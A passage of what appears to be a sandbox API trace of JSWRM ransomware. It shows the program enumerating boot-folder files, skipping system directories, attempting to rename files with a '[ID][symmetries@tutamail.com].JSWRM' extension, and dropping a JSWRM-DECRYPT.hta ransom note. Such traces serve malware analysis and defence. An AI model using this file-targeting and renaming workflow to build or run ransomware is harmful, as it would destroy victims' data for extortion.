[0064.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0064.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.373] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.373] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.373] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.373] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9256135561371256) returned 0 [0064.373] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.373] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.374] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.374] CloseHandle (hObject=0xffffffff) returned 1 [0064.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0064.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0064.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0064.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c488 [0064.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226730 [0064.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c488 | out: hHeap=0x1e0000) returned 1 [0064.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0064.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226730 | out: hHeap=0x1e0000) returned 1 [0064.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.374] MoveFileW (lpExistingFileName="C:\\Boot\\sv-SE\\memtest.exe.mui" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\sv-SE\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\sv-se\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0064.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0064.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.374] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6a2250, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f699a6, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xaf98, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0064.374] FindClose (in: hFindFile=0x231c40 | out: hFindFile=0x231c40) returned 1 [0064.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0064.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.375] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef6b5aca, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0064.375] lstrcmpiW (lpString1="tr-TR", lpString2=".") returned 1 [0064.375] lstrcmpiW (lpString1="tr-TR", lpString2="..") returned 1 [0064.375] lstrcmpiW (lpString1="tr-TR", lpString2="...") returned 1 [0064.375] lstrcmpiW (lpString1="tr-TR", lpString2="windows") returned -1 [0064.375] lstrcmpiW (lpString1="tr-TR", lpString2="recovery") returned 1 [0064.375] lstrcmpiW (lpString1="tr-TR", lpString2="perflogs") returned 1 [0064.375] lstrcmpiW (lpString1="tr-TR", lpString2="documents and settings") returned 1 [0064.375] lstrcmpiW (lpString1="tr-TR", lpString2="$RECYCLE.BIN") returned 1 [0064.375] lstrcmpiW (lpString1="tr-TR", lpString2="system volume information") returned 1 [0064.375] lstrcmpiW (lpString1="tr-TR", lpString2="msocache") returned 1 [0064.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0064.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0064.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x236d68 [0064.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.375] GetFileAttributesW (lpFileName="C:\\Boot\\tr-TR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\tr-tr\\jswrm-decrypt.hta")) returned 0xffffffff [0064.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236d68 | out: hHeap=0x1e0000) returned 1 [0064.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.375] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0064.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.375] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0064.375] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x237588 [0064.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.376] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\tr-tr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.376] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.376] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.377] CloseHandle (hObject=0x450) returned 1 [0064.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x237588 | out: hHeap=0x1e0000) returned 1 [0064.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0064.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0064.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0064.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x46) returned 0x2374e8 [0064.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.378] GetFileAttributesW (lpFileName="C:\\Boot\\tr-TR\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\tr-tr\\jswrm-decrypt.hta")) returned 0x20 [0064.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2374e8 | out: hHeap=0x1e0000) returned 1 [0064.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.378] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1d07b1af, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231e80 [0064.379] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.379] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0206504, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1d07b1af, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.379] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.379] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.379] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210e1cce, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12558, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.379] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.379] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.379] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.379] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.379] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.379] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.379] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.379] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.379] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.379] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0064.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0064.379] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0064.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.379] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0064.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0064.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.380] CreateFileW (lpFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.381] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987244136) returned 0 [0064.381] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.381] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.381] CloseHandle (hObject=0xffffffff) returned 1 [0064.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0064.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0064.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0064.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2265b0 [0064.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0064.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0064.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2265b0 | out: hHeap=0x1e0000) returned 1 [0064.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.382] MoveFileW (lpExistingFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\tr-TR\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\tr-tr\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0064.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.382] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d07b1af, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1d07b1af, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1d07b1af, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0064.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0064.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0064.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0064.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0064.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0064.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0064.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.382] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.382] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0064.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0064.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0064.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0064.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0064.383] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef6b5aca, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2f4373a, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0064.383] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0064.383] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0064.383] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0064.383] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0064.383] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0064.383] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0064.383] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0064.383] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.383] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0064.383] lstrcmpiW 